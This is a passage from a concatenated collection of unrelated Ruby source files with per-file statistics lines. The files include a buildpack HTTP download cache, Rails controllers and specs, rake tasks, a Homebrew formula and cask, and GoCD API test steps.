        if internet_up && should_update(filenames)
          update(filenames, uri)
        elsif should_download(filenames)
          download(filenames, uri, internet_up)
        end

        # Downgrade to a shared lock: mutation is finished, readers may proceed concurrently.
        lock_file.flock(File::LOCK_SH)

        File.open(filenames[:cached], File::RDONLY) do |cached_file|
          yield cached_file
        end
      end
    end

    # Remove an item from the cache
    #
    # @param [String] uri the URI of the item to remove
    # @return [void]
    def evict(uri)
      filenames = filenames(uri)
      File.open(filenames[:lock], File::CREAT) do |lock_file|
        lock_file.flock(File::LOCK_EX)

        delete_file filenames[:cached]
        delete_file filenames[:etag]
        delete_file filenames[:last_modified]
        delete_file filenames[:lock]
      end
    end

    private

    # Location of the remote_downloads configuration, relative to this file.
    CACHE_CONFIG = '../../../config/cache.yml'.freeze

    # Transient network errors that should be handled rather than crash the buildpack.
    HTTP_ERRORS = [
      EOFError,
      Errno::ECONNREFUSED,
      Errno::ECONNRESET,
      Errno::EHOSTUNREACH,
      Errno::EINVAL,
      Errno::EPIPE,
      Errno::ETIMEDOUT,
      Net::HTTPBadResponse,
      Net::HTTPHeaderSyntaxError,
      Net::ProtocolError,
      SocketError,
      Timeout::Error
    ].freeze

    HTTP_OK = '200'.freeze

    # Class-wide internet-availability state, guarded by @@monitor so the
    # probe runs at most once per process.
    @@monitor = Monitor.new
    @@internet_checked = false
    @@internet_up = true

    def self.get_configuration
      expanded_path = File.expand_path(CACHE_CONFIG, File.dirname(__FILE__))
      YAML.load_file(expanded_path)
    end

    TIMEOUT_SECONDS = 10

    # Probes +uri+ once (result memoized for the process) to decide whether
    # remote downloads are possible; may also be forced on/off by the
    # remote_downloads configuration property.
    def self.internet_available?(uri, logger)
      @@monitor.synchronize do
        return @@internet_up if @@internet_checked
      end
      cache_configuration = get_configuration
      if cache_configuration['remote_downloads'] == 'disabled'
        store_internet_availability false
      elsif cache_configuration['remote_downloads'] == 'enabled'
        begin
          rich_uri = URI(uri)
          # Beware known problems with timeouts: https://www.ruby-forum.com/topic/143840
          Net::HTTP.start(rich_uri.host, rich_uri.port, read_timeout: TIMEOUT_SECONDS, connect_timeout: TIMEOUT_SECONDS, open_timeout: TIMEOUT_SECONDS) do |http|
            request = Net::HTTP::Get.new(uri)
            http.request request do |response|
              internet_up = response.code == HTTP_OK
              store_internet_availability internet_up
            end
          end
        rescue *HTTP_ERRORS => ex
          logger.debug { "Internet detection failed with #{ex}" }
          store_internet_availability false
        end
      else
        raise "Invalid remote_downloads property in cache configuration: #{cache_configuration}"
      end
    end

    def self.store_internet_availability(internet_up)
      @@monitor.synchronize do
        @@internet_up = internet_up
        @@internet_checked = true
      end
      internet_up
    end

    def delete_file(filename)
      File.delete filename if File.exists? filename
    end

    # Downloads +uri+ into the cache; when the internet is known to be down,
    # falls back to the read-only buildpack cache instead.
    def download(filenames, uri, internet_up)
      if internet_up
        begin
          rich_uri = URI(uri)
          Net::HTTP.start(rich_uri.host, rich_uri.port, use_ssl: use_ssl?(rich_uri)) do |http|
            request = Net::HTTP::Get.new(uri)
            http.request request do |response|
              write_response(filenames, response)
            end
          end
        rescue *HTTP_ERRORS => ex
          # Removed a leftover debug `puts 'FAIL'` that polluted stdout here.
          error_message = "Unable to download from #{uri} due to #{ex}"
          raise error_message
        end
      else
        look_aside(filenames, uri)
      end
    end

    # Derives the cache/etag/last-modified/lock file paths for +uri+.
    def filenames(uri)
      key = URI.escape(uri, '/')
      {
        cached: File.join(@cache_root, "#{key}.cached"),
        etag: File.join(@cache_root, "#{key}.etag"),
        last_modified: File.join(@cache_root, "#{key}.last_modified"),
        lock: File.join(@cache_root, "#{key}.lock")
      }
    end

    # A download has failed, so check the read-only buildpack cache for the file
    # and use the copy there if it exists.
    def look_aside(filenames, uri)
      @logger.debug "Unable to download from #{uri}. Looking in buildpack cache."
      key = URI.escape(uri, '/')
      stashed = File.join(ENV['BUILDPACK_CACHE'], 'java-buildpack', "#{key}.cached")
      @logger.debug { "Looking in buildpack cache for file '#{stashed}'" }
      if File.exist? stashed
        FileUtils.cp(stashed, filenames[:cached])
        @logger.debug "Using copy of #{uri} from buildpack cache."
      else
        message = "Buildpack cache does not contain #{uri}. Failing the download."
        @logger.error message
        @logger.debug { "Buildpack cache contents:\n#{`ls -lR #{File.join(ENV['BUILDPACK_CACHE'], 'java-buildpack')}`}" }
        raise message
      end
    end

    # Persists a response header's value to +filename+ when present.
    def persist_header(response, header, filename)
      unless response[header].nil?
        File.open(filename, File::CREAT | File::WRONLY) do |file|
          file.write(response[header])
          file.fsync
        end
      end
    end

    # Sets a request header from the persisted value in +filename+ when present.
    def set_header(request, header, filename)
      if File.exists?(filename)
        File.open(filename, File::RDONLY) do |file|
          request[header] = file.read
        end
      end
    end

    def should_download(filenames)
      !File.exists?(filenames[:cached])
    end

    # An update (conditional GET) is only worthwhile when we have the cached
    # file plus an Etag or Last-Modified to validate it with.
    def should_update(filenames)
      File.exists?(filenames[:cached]) && (File.exists?(filenames[:etag]) || File.exists?(filenames[:last_modified]))
    end

    # Conditional re-download: a 304 leaves the cached copy untouched;
    # transient network failures fall back to the cached version.
    def update(filenames, uri)
      rich_uri = URI(uri)

      Net::HTTP.start(rich_uri.host, rich_uri.port, use_ssl: use_ssl?(rich_uri)) do |http|
        request = Net::HTTP::Get.new(uri)
        set_header request, 'If-None-Match', filenames[:etag]
        set_header request, 'If-Modified-Since', filenames[:last_modified]

        http.request request do |response|
          write_response(filenames, response) unless response.code == '304'
        end
      end

    rescue *HTTP_ERRORS => ex
      @logger.warn "Unable to update from #{uri} due to #{ex}. Using cached version."
    end

    def use_ssl?(uri)
      uri.scheme == 'https'
    end

    # Streams the response body into the cached file and records its
    # Etag/Last-Modified headers for future conditional requests.
    def write_response(filenames, response)
      persist_header response, 'Etag', filenames[:etag]
      persist_header response, 'Last-Modified', filenames[:last_modified]

      File.open(filenames[:cached], File::CREAT | File::WRONLY) do |cached_file|
        response.read_body do |chunk|
          cached_file.write(chunk)
        end
      end
    end

  end

end
| 35.291815 | 161 | 0.655037 |
ab87dac7f8674b635fad6cc66d2a1ba1a83b7261 | 541 | module Cache
class AdditionalCodeIndex < ::Cache::CacheIndex
  # Elasticsearch index definition for additional codes: exact-match
  # keyword fields for the code identifiers, a snowball-stemmed text field
  # for the description, and lenient date fields for the validity window.
  # `dynamic: false` stops unlisted attributes from being indexed.
  def definition
    date_mapping = { type: 'date', format: 'date_optional_time' }

    {
      mappings: {
        dynamic: false,
        properties: {
          additional_code: { type: 'keyword' },
          additional_code_type_id: { type: 'keyword' },
          description: { type: 'text', analyzer: 'snowball' },
          # .dup keeps the two date mappings as independent hashes, as before
          validity_start_date: date_mapping.dup,
          validity_end_date: date_mapping.dup,
        }
      }
    }
  end
end
end
| 28.473684 | 80 | 0.548983 |
7a8b0b5659e5586674e7a060b59164fd646d1793 | 464 | class TapsController < ApplicationController
  # JSON-only API for beer taps (list, show, and attaching a keg).
  respond_to :json, :only => [:index, :show, :update]
  # NOTE(review): before_filter is the pre-Rails-5 spelling of
  # before_action — fine on older Rails, removed in 5.0+.
  before_filter :find_beer_tap, :only => [:show, :update]

  def index
    respond_with(BeerTap.all)
  end

  def show
    respond_with(@beer_tap)
  end

  # Attaches the keg identified by params[:keg_id] to this tap.
  # NOTE(review): the #save return value is ignored, so a failed save still
  # responds with the (unsaved) tap.
  def update
    keg = Keg.find(params[:keg_id])
    @beer_tap.keg = keg
    @beer_tap.save
    respond_with(@beer_tap)
  end

  private

  # Loads the tap for :show/:update from params[:id].
  def find_beer_tap
    @beer_tap = BeerTap.find(params[:id])
  end
end
| 17.185185 | 57 | 0.672414 |
e28d2ca553643334b60c97ca034261bd90950bd0 | 1,307 | # frozen_string_literal: true
require 'spec_helper'
# This test serves as a regression test for a bug that caused an error
# message to be shown by JavaScript when the source branch was deleted.
# Please do not remove ":js".
describe 'Merge request > User sees MR with deleted source branch', :js do
let(:project) { create(:project, :public, :repository) }
let(:merge_request) { create(:merge_request, source_project: project) }
let(:user) { project.creator }
before do
stub_feature_flags(single_mr_diff_view: false)
merge_request.update!(source_branch: 'this-branch-does-not-exist')
sign_in(user)
visit project_merge_request_path(project, merge_request)
end
it_behaves_like 'rendering a single diff version'
it 'shows a message about missing source branch' do
expect(page).to have_content('Source branch does not exist.')
end
it 'still contains Discussion, Commits and Changes tabs' do
within '.merge-request-details' do
expect(page).to have_content('Overview')
expect(page).to have_content('Commits')
expect(page).to have_content('Changes')
end
expect(page).to have_content('Source branch does not exist.')
click_on 'Changes'
wait_for_requests
expect(page).to have_selector('.diffs.tab-pane .file-holder')
end
end
| 31.878049 | 74 | 0.730681 |
39e4682447c22b34a35863e4c75956552f13a708 | 2,206 | # ref. http://pocke.hatenablog.com/entry/2016/01/16/155004
namespace :db do
  # desc 'Generate model files from db schema'
  desc 'スキーマからモデルを生成'
  # Re-evaluates db/schema.rb with a stubbed ActiveRecord::Schema.define so
  # that create_table/add_foreign_key calls build a model graph, then writes
  # a skeleton model file (with has_many/belongs_to) for each table that
  # does not already have one.
  task gen: :environment do
    module ModelGenerator
      # table class name => { has_many: [...], belongs_to: [...] }
      Models = {}

      # Receives the schema DSL calls via class_eval below.
      module Evaluator
        module_function

        def create_table(table_name, *)
          Models[table_name.classify] = {
            has_many: [],
            belongs_to: [],
          }
        end

        # add_index is irrelevant for associations — ignored.
        def add_index(*) end

        # A foreign key from -> to implies `from belongs_to to` and
        # `to has_many from`.
        def add_foreign_key(from, to)
          fromc, toc = from.classify, to.classify
          Models[fromc][:belongs_to].push to.singularize
          Models[toc][:has_many].push from
        end
      end

      # Writes app/models/<table>.rb for each collected model; existing
      # files are never overwritten.
      # (Removed a leftover `debugger` breakpoint that halted this loop.)
      def self.save
        Models.each do |klass, data|
          code = [
            "class #{klass} < ApplicationRecord",
            data[:has_many].map{|x| "  has_many :#{x}"},
            data[:belongs_to].map{|x| "  belongs_to :#{x}"},
            "end\n",
          ].flatten.join("\n")
          path = Rails.root.join('app', 'models', "#{klass.underscore}.rb")
          File.write(path, code) unless File.exist?(path)
        end
      end
    end

    # Redirect Schema.define so loading schema.rb feeds the Evaluator
    # instead of touching the database.
    s = ActiveRecord::Schema
    def s.define(*, &block)
      ModelGenerator::Evaluator.class_eval(&block)
    end
    load Rails.root.join('db', 'schema.rb')

    ModelGenerator.save
  end

  desc 'seed データのdump'
  # Dumps the rows of target_tables into SeedFu fixture files, dropping
  # deleted_at and stringifying timestamps/dates for stable output.
  task seed_dump: :environment do
    target_tables.each do |table|
      model = table.classify.constantize
      puts "#{model} - #{model.all.size}"
      next if model.all.empty?
      SeedFu::Writer.write("db/fixtures/#{table}.rb", class_name: table.classify) do |writer|
        model.order(:id).find_each do |rec|
          edit_attrs = rec.attributes
          edit_attrs.delete("deleted_at")
          edit_attrs.each_pair do |key, _val|
            if edit_attrs[key].is_a?(ActiveSupport::TimeWithZone) || edit_attrs[key].is_a?(Date)
              edit_attrs[key] = edit_attrs[key].to_s
            end
          end
          writer << edit_attrs
        end
      end
    end
  end

  # NOTE(review): defined inside the namespace but, per Rake semantics, this
  # becomes a method on Object (visible everywhere), not namespace-scoped.
  def target_tables
    %w[systems customers]
  end
end
| 27.575 | 97 | 0.550771 |
1846ba47e01a34f5466a9869d13d66897dc29143 | 4,464 | require 'rails_helper'
if ExchangeTestingConfigurationHelper.general_agency_enabled?
RSpec.describe ShopGeneralAgencyNotices::GeneralAgencyHiredNotice, :dbclean => :after_each do
let!(:hbx_profile) { FactoryBot.create(:hbx_profile, organization: organization) }
let!(:person) { FactoryBot.create(:person, :with_work_email, :with_hbx_staff_role) }
let!(:general_agency_profile) {
general_agency_staff_role.unset(:benefit_sponsors_general_agency_profile_id) # ToDo - Fix/Move to new model
general_agency_staff_role.general_agency_profile
}
let!(:general_agency_staff_role) {FactoryBot.create(:general_agency_staff_role, person: person)}
let!(:organization) {FactoryBot.create(:organization)}
let!(:employer_profile) { FactoryBot.create(:employer_profile, general_agency_profile: general_agency_profile) }
let!(:broker_agency_profile) { FactoryBot.create(:broker_agency_profile, organization: organization ) }
let!(:broker_role) { broker_agency_profile.primary_broker_role }
let!(:application_event){ double("ApplicationEventKind",{
:name =>'General Agency hired notification',
:notice_template => 'notices/shop_general_agency_notices/general_agency_hired_notice',
:notice_builder => 'ShopGeneralAgencyNotices::GeneralAgencyHiredNotice',
:mpi_indicator => 'SHOP_D085',
:event_name => 'general_agency_hired_notice',
:title => "Employer has hired you as a General agency"})
}
let!(:valid_params) {{
:subject => application_event.title,
:mpi_indicator => application_event.mpi_indicator,
:event_name => application_event.event_name,
:template => application_event.notice_template,
:options => {
:employer_profile_id => employer_profile.id.to_s
}
}}
before do
@general_agency_notice = ShopGeneralAgencyNotices::GeneralAgencyHiredNotice.new(general_agency_profile, valid_params)
allow(general_agency_profile).to receive(:general_agency_staff_roles).and_return([general_agency_staff_role])
end
describe "New" do
context "valid params" do
it "should initialze" do
expect{ShopGeneralAgencyNotices::GeneralAgencyHiredNotice.new(general_agency_profile, valid_params)}.not_to raise_error
end
end
context "invalid params" do
[:mpi_indicator,:subject,:template].each do |key|
it "should NOT initialze with out #{key}" do
valid_params.delete(key)
expect{ShopGeneralAgencyNotices::GeneralAgencyHiredNotice.new(general_agency_profile, valid_params)}.to raise_error(RuntimeError,"Required params #{key} not present")
end
end
end
end
describe "Build" do
it "should build notice with all necessory info" do
@general_agency_notice.build
expect(@general_agency_notice.notice.primary_fullname).to eq person.full_name.titleize
end
end
describe "append data" do
before :each do
person.employer_staff_roles.create!(employer_profile_id: employer_profile.id)
employer_profile.broker_agency_accounts.create!(broker_agency_profile_id: broker_agency_profile.id, start_on: TimeKeeper.date_of_record - 35.days)
end
it "should append employer staff name" do
@general_agency_notice.append_data
expect(@general_agency_notice.notice.general_agency.employer_fullname).to eq employer_profile.staff_roles.first.full_name.titleize
end
it "should append employer legal name" do
@general_agency_notice.append_data
expect(@general_agency_notice.notice.general_agency.employer).to eq employer_profile.organization.legal_name
end
it "should append broker_fullname" do
@general_agency_notice.append_data
expect(@general_agency_notice.notice.general_agency.broker_fullname).to eq broker_role.person.full_name
end
describe "for generating pdf" do
it "should generate pdf" do
@general_agency_notice.build
@general_agency_notice.append_data
file = @general_agency_notice.generate_pdf_notice
expect(File.exist?(file.path)).to be true
end
end
end
describe "should render template" do
it "render broker_fires_default_ga_notice" do
expect(@general_agency_notice.template).to eq "notices/shop_general_agency_notices/general_agency_hired_notice"
end
end
end
end
| 44.19802 | 176 | 0.730735 |
bf9845d2e7da28d4b13c48b0b6de8d21ec9219fb | 4,840 | # @file TestL3LocalParameter.rb
# @brief L3 Local Parameter unit tests
#
# @author Akiya Jouraku (Ruby conversion)
# @author Sarah Keating
#
#
# ====== WARNING ===== WARNING ===== WARNING ===== WARNING ===== WARNING ======
#
# DO NOT EDIT THIS FILE.
#
# This file was generated automatically by converting the file located at
# src/sbml/test/TestL3LocalParameter.c
# using the conversion program dev/utilities/translateTests/translateTests.pl.
# Any changes made here will be lost the next time the file is regenerated.
#
# -----------------------------------------------------------------------------
# This file is part of libSBML. Please visit http://sbml.org for more
# information about SBML, and the latest version of libSBML.
#
# Copyright 2005-2010 California Institute of Technology.
# Copyright 2002-2005 California Institute of Technology and
# Japan Science and Technology Corporation.
#
# This library is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation. A copy of the license agreement is provided
# in the file named "LICENSE.txt" included with this software distribution
# and also available online as http://sbml.org/software/libsbml/license.html
# -----------------------------------------------------------------------------
require 'test/unit'
require 'libSBML'
class TestL3LocalParameter < Test::Unit::TestCase
def isnan(x)
return (x != x)
end
def setup
@@p = LibSBML::LocalParameter.new(3,1)
if (@@p == nil)
end
end
def teardown
@@p = nil
end
def test_L3_LocalParameter_NS
assert( @@p.getNamespaces() != nil )
assert( @@p.getNamespaces().getLength() == 1 )
assert (( "http://www.sbml.org/sbml/level3/version1/core" == @@p.getNamespaces().getURI(0) ))
end
def test_L3_LocalParameter_create
assert( @@p.getTypeCode() == LibSBML::SBML_LOCAL_PARAMETER )
assert( @@p.getMetaId() == "" )
assert( @@p.getNotes() == nil )
assert( @@p.getAnnotation() == nil )
assert( @@p.getId() == "" )
assert( @@p.getName() == "" )
assert( @@p.getUnits() == "" )
assert_equal true, isnan(@@p.getValue())
assert_equal false, @@p.isSetId()
assert_equal false, @@p.isSetName()
assert_equal false, @@p.isSetValue()
assert_equal false, @@p.isSetUnits()
end
def test_L3_LocalParameter_createWithNS
xmlns = LibSBML::XMLNamespaces.new()
xmlns.add( "http://www.sbml.org", "testsbml")
sbmlns = LibSBML::SBMLNamespaces.new(3,1)
sbmlns.addNamespaces(xmlns)
p = LibSBML::LocalParameter.new(sbmlns)
assert( p.getTypeCode() == LibSBML::SBML_LOCAL_PARAMETER )
assert( p.getMetaId() == "" )
assert( p.getNotes() == nil )
assert( p.getAnnotation() == nil )
assert( p.getLevel() == 3 )
assert( p.getVersion() == 1 )
assert( p.getNamespaces() != nil )
assert( p.getNamespaces().getLength() == 2 )
assert( p.getId() == "" )
assert( p.getName() == "" )
assert( p.getUnits() == "" )
assert_equal true, isnan(p.getValue())
assert_equal false, p.isSetId()
assert_equal false, p.isSetName()
assert_equal false, p.isSetValue()
assert_equal false, p.isSetUnits()
p = nil
end
def test_L3_LocalParameter_free_NULL
end
def test_L3_LocalParameter_hasRequiredAttributes
p = LibSBML::LocalParameter.new(3,1)
assert_equal false, p.hasRequiredAttributes()
p.setId( "id")
assert_equal true, p.hasRequiredAttributes()
p = nil
end
def test_L3_LocalParameter_id
id = "mitochondria";
assert_equal false, @@p.isSetId()
@@p.setId(id)
assert (( id == @@p.getId() ))
assert_equal true, @@p.isSetId()
if (@@p.getId() == id)
end
end
def test_L3_LocalParameter_name
name = "My_Favorite_Factory";
assert_equal false, @@p.isSetName()
@@p.setName(name)
assert (( name == @@p.getName() ))
assert_equal true, @@p.isSetName()
if (@@p.getName() == name)
end
@@p.unsetName()
assert_equal false, @@p.isSetName()
if (@@p.getName() != nil)
end
end
def test_L3_LocalParameter_units
units = "volume";
assert_equal false, @@p.isSetUnits()
@@p.setUnits(units)
assert (( units == @@p.getUnits() ))
assert_equal true, @@p.isSetUnits()
if (@@p.getUnits() == units)
end
@@p.unsetUnits()
assert_equal false, @@p.isSetUnits()
if (@@p.getUnits() != nil)
end
end
def test_L3_LocalParameter_value
assert_equal false, @@p.isSetValue()
assert_equal true, isnan(@@p.getValue())
@@p.setValue(1.5)
assert_equal true, @@p.isSetValue()
assert( @@p.getValue() == 1.5 )
@@p.unsetValue()
assert_equal false, @@p.isSetValue()
assert_equal true, isnan(@@p.getValue())
end
end
| 30.828025 | 101 | 0.631818 |
f7bc0a4b75b52c398298024d454e9d2666e75661 | 790 | cask "fog" do
version "1.4.5"
sha256 "dbf1216fce69ead08e9e9a37b18391d3d65e7f06ae4e6f633e7047832c6b1adc"
url "https://github.com/vitorgalvao/fog/releases/download/#{version}/Fog-#{version}-mac.zip"
name "Fog"
desc "Unofficial overcast.fm podcast app"
homepage "https://github.com/vitorgalvao/fog"
app "Fog.app"
uninstall quit: "com.vitorgalvao.fog"
zap trash: [
"~/Library/Application Support/Fog",
"~/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/com.vitorgalvao.fog.sfl*",
"~/Library/Caches/Fog",
"~/Library/Preferences/com.vitorgalvao.fog.helper.plist",
"~/Library/Preferences/com.vitorgalvao.fog.plist",
"~/Library/Saved Application State/com.vitorgalvao.fog.savedState",
]
end
| 34.347826 | 140 | 0.744304 |
5ddce112005241fab8c2e8b9a869bbf65e6306c5 | 3,103 | require 'rails_helper'
RSpec.describe Api::V4::SplitRegistriesController, type: :controller do
describe "#show" do
before do
allow(Rails.configuration).to receive(:experience_sampling_weight).and_return(10)
end
it "includes sampling weight" do
get :show, params: { build_timestamp: '2019-11-11T14:35:30Z' }
expect(response).to have_http_status :ok
expect(response_json['experience_sampling_weight']).to eq(10)
end
context "without active split on given timestamp" do
let!(:split_1) { FactoryBot.create :split, name: "one", finished_at: Time.zone.parse('2019-11-13'), registry: { all: 100 } }
it "returns empty with no active splits on the timestamp" do
expect(split_1).to be_finished
get :show, params: { build_timestamp: '2019-11-14T14:35:30Z' }
expect(response).to have_http_status :ok
expect(response_json['splits']).to eq([])
end
end
context "with splits active on given during timestamp" do
let(:split_1) { FactoryBot.create :split, name: "one", finished_at: Time.zone.parse('2019-11-13'), registry: { all: 100 } }
let(:split_2) { FactoryBot.create :split, name: "two", registry: { on: 50, off: 50 } }
let(:split_3) { FactoryBot.create :split, name: "three_enabled", registry: { true: 99, false: 1 }, feature_gate: true }
it "returns the full split registry of splits that are active during timestamp" do
expect(split_1).to be_finished
expect(split_2).not_to be_finished
expect(split_3).not_to be_finished
get :show, params: { build_timestamp: '2019-11-12T14:35:30Z' }
expect(response).to have_http_status :ok
expect(response_json['splits']).to eq([
{
"name" => "one",
"variants" => [
{
"name" => "all",
"weight" => 100
}
],
"feature_gate" => false
},
{
"name" => "two",
"variants" => [
{
"name" => "on",
"weight" => 50
},
{
"name" => "off",
"weight" => 50
}
],
"feature_gate" => false
},
{
"name" => "three_enabled",
"variants" => [
{
"name" => "true",
"weight" => 99
},
{
"name" => "false",
"weight" => 1
}
],
"feature_gate" => true
}
])
end
end
it "returns unprocessable_entity if the timestamp url param is invalid" do
get :show, params: { build_timestamp: "2019-04-16 10:38:08 -0400" }
expect(response).to have_http_status :unprocessable_entity
end
it "returns unprocessable_entity if the timestamp url param is missing" do
get :show, params: { build_timestamp: "" }
expect(response).to have_http_status :unprocessable_entity
end
end
end
| 31.663265 | 130 | 0.540445 |
18795cf1ad667a4d6b4d3c1703a561dda48f1413 | 339 | Rails.application.routes.draw do
get '/home', to: 'static_pages#home'
get '/help', to: 'static_pages#help'
get '/about', to: 'static_pages#about'
get '/contact', to: 'static_pages#contact'
# For details on the DSL available within this file, see http://guides.rubyonrails.org/routing.html
root 'static_pages#home'
end
| 24.214286 | 101 | 0.702065 |
61f581e88e16d7b8fef3c4d2bf2bddb6f264cd29 | 432 | module WindowBlessing
module Widgets
class Label < WindowBlessing::Window
attr_accessor_with_redraw :text, :fg, :bg
def initialize(rect, text, fill_options={})
super rect
@text = text
@fg = fill_options[:fg]
@bg = fill_options[:bg]
request_redraw_internal
end
def pointer_inside?(loc) false; end
def draw_background
buffer.contents = text
buffer.fill :fg => fg, :bg => bg
end
end
end
end
| 18 | 45 | 0.689815 |
216119758f6b42710404ebfdc36a02eafe2c189e | 336 | unless ENV['CI']
require 'simplecov'
SimpleCov.start do
add_filter 'spec'
end
end
require 'livelyfeed'
require 'rspec'
require 'stringio'
require 'tempfile'
require 'timecop'
require 'webmock/rspec'
def fixture_path
File.expand_path("../fixtures", __FILE__)
end
def fixture(file)
File.new(fixture_path + '/' + file)
end | 16 | 43 | 0.72619 |
b9f79c753bc089c8ff3d17c9bec339dbb56f68d3 | 1,355 | class AbiComplianceChecker < Formula
desc "Check binary and source compatibility for C/C++"
homepage "http://ispras.linuxbase.org/index.php/ABI_compliance_checker"
url "https://github.com/lvc/abi-compliance-checker/archive/1.99.21.tar.gz"
sha256 "c9ca13a9a7a0285214f9a18195efae57a99465392fbf05fdc4a15fceada4dedf"
bottle do
cellar :any_skip_relocation
sha256 "1b6be53767663eaf2ee6b938e485ff6fcbd03069abf4a64a7fe2e67076faa479" => :el_capitan
sha256 "74d3ef1fff52a93936a8ae81d3dc9a6a2497cbcd5babf735d803b734d1d749fc" => :yosemite
sha256 "418e0920e1e2e90efe573a3e617a4a6b4aa90c27e7e6843ae178a262b9f858de" => :mavericks
end
depends_on "ctags"
depends_on "gcc" => :run
def install
system "perl", "Makefile.pl", "-install", "--prefix=#{prefix}"
rm bin/"abi-compliance-checker.cmd"
end
test do
(testpath/"test.xml").write <<-EOS.undent
<version>1.0</version>
<headers>#{Formula["ctags"].include}</headers>
<libs>#{Formula["ctags"].lib}</libs>
EOS
gcc_suffix = Formula["gcc"].version.to_s.slice(/\d/)
system bin/"abi-compliance-checker", "-cross-gcc", "gcc-" + gcc_suffix,
"-lib", "ctags",
"-old", testpath/"test.xml",
"-new", testpath/"test.xml"
end
end
| 38.714286 | 92 | 0.658303 |
e29046165e7bf7fd17e4f8c32f2c9b21867e0459 | 1,119 | module ClientApi
class TeamsService
def initialize(arg)
@params = arg.fetch(:params) { false }
@user = arg.fetch(:current_user) { raise ClientApi::CustomTeamError }
team_id = arg.fetch(:team_id) { raise ClientApi::CustomTeamError }
@team = Team.find_by_id(team_id)
raise ClientApi::CustomTeamError unless @user.teams.include? @team
end
def change_current_team!
@user.update_attribute(:current_team_id, @team.id)
end
def team_page_details_data
team_users = UserTeam.includes(:user)
.references(:user)
.where(team: @team)
.distinct
{ team: @team, team_users: team_users }
end
def single_team_details_data
{ team: @team }
end
def update_team!
raise ClientApi::CustomTeamError unless @params
return if @team.update_attributes(@params)
raise ClientApi::CustomTeamError, @team.errors.full_messages
end
def teams_data
{ teams: @user.datatables_teams }
end
end
CustomTeamError = Class.new(StandardError)
end
| 27.975 | 75 | 0.637176 |
5da8edc2c6d6e2eb9a011b757d2eab7c5bda9902 | 378 | # frozen_string_literal: true
module ValidatorHelper
class Validatable
include ActiveModel::Model
def self.model_name
ActiveModel::Name.new self, nil, 'temp'
end
# we need to set explicitly i18n_scope to :activerecord
# this way we can test i18n of error messages without ActiveRecord
def self.i18n_scope
:activerecord
end
end
end
| 21 | 70 | 0.716931 |
d58c2bee38f065f1e859a8179e42abba47d89880 | 4,771 | #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
require_relative '../../lib/helpers/go_url_helper.rb'
CONFIG_REPO_API_VERSION = 'application/vnd.go.cd+json'.freeze
CONFIG_REPO_BASE_URL = '/api/admin/config_repos'.freeze
step 'Create config repo <id>' do |id|
assert_true create_config_repo(id).code == 200
end
step 'Create config repo <id> should return forbidden' do |id|
begin
create_config_repo(id)
raise 'Expected create config_repo to fail'
rescue RestClient::ExceptionWithResponse => e
raise 'Response Code is not 403' unless e.response.code == 403
end
end
step 'Get config repo <id> should return success' do |id|
assert_true get_config_repo(id).code == 200
end
step 'Get config repo <id> should return forbidden' do |id|
begin
get_config_repo(id)
raise 'Expected get config_repo to fail'
rescue RestClient::ExceptionWithResponse => e
raise 'Response Code is not 403' unless e.response.code == 403
end
end
step 'Get all config repos should have <repos>' do |repos|
actual = JSON.parse(get_all_config_repos.body)['_embedded']['config_repos'].map {|cr| cr['id']}.sort
expected = repos.split(/[\s,]+/).map {|exp| scenario_state.get(exp).nil? ? exp : scenario_state.get(exp)}.sort
assert_true (expected - actual).empty?, "Assertion failed. Expected: #{expected}, Actual: #{actual}"
end
step 'Get all config repos should not have <repos>' do |repos|
actual = JSON.parse(get_all_config_repos.body)['_embedded']['config_repos'].map {|cr| cr['id']}.sort
expected = repos.split(/[\s,]+/).map {|exp| scenario_state.get(exp).nil? ? exp : scenario_state.get(exp)}.sort
assert_true actual.none? {|n| expected.include?(n)}, "Assertion failed. Expected: #{expected} not to be in: #{actual}"
end
step 'Update config repo <id> should return success' do |id|
assert_true update_config_repo(id).code == 200
end
step 'Update config repo <id> should return forbidden' do |id|
begin
update_config_repo(id)
raise 'Expected update config repo to fail'
rescue RestClient::ExceptionWithResponse => e
raise 'Response Code is not 403' unless e.response.code == 403
end
end
step 'Delete config repo <id> should return success' do |id|
assert_true delete_config_repo(id).code == 200
end
step 'Delete config repo <id> should return forbidden' do |id|
begin
delete_config_repo(id)
raise 'Expected delete config repo to fail'
rescue RestClient::ExceptionWithResponse => e
raise 'Response Code is not 403' unless e.response.code == 403
end
end
private
def get_all_config_repos
RestClient.get http_url(CONFIG_REPO_BASE_URL),
{accept: CONFIG_REPO_API_VERSION}
.merge(basic_configuration.header)
end
def get_config_repo(id)
RestClient.get http_url("#{CONFIG_REPO_BASE_URL}/#{id}"),
{accept: CONFIG_REPO_API_VERSION}
.merge(basic_configuration.header)
end
def create_config_repo(id)
RestClient.post http_url(CONFIG_REPO_BASE_URL),
request_body_for_repo(id),
{content_type: :json, accept: CONFIG_REPO_API_VERSION}
.merge(basic_configuration.header)
end
def delete_config_repo(id)
RestClient.delete http_url("#{CONFIG_REPO_BASE_URL}/#{id}"),
{accept: CONFIG_REPO_API_VERSION}
.merge(basic_configuration.header)
end
def update_config_repo(id)
etag = get_config_repo(id).headers[:etag]
RestClient.put http_url("#{CONFIG_REPO_BASE_URL}/#{id}"),
request_body_for_repo(id),
{content_type: :json, accept: CONFIG_REPO_API_VERSION, if_match: etag}
.merge(basic_configuration.header)
end
def request_body_for_repo(id, plugin_id = 'json.config.plugin', material = Context::GitMaterials.new, configuration = [])
tmp = {
:id => id,
:plugin_id => plugin_id,
:material => {
:type => "git",
:attributes => {
:url => material.path,
:branch => "master",
:auto_update => true
}
},
:configuration => configuration
}
JSON.generate(tmp)
end
| 35.080882 | 121 | 0.671138 |
33ca67e033e8b04dd6f4b0bdd72eab433bd79f8b | 621 | # TODO think about a better way
db_name = app_path.split('/').last
remove_file 'config/database.yml'
create_file 'config/database.yml' do
<<-YAML
defaults: &defaults
adapter: sqlite3
development:
database: dm_rails3_app_development.db
<<: *defaults
# Add more repositories
# repositories:
# repo1:
# adapter: postgresql
# database: sample_development
# username: the_user
# password: secrets
# host: localhost
# repo2:
# ...
test:
database: dm_rails3_app_test.db
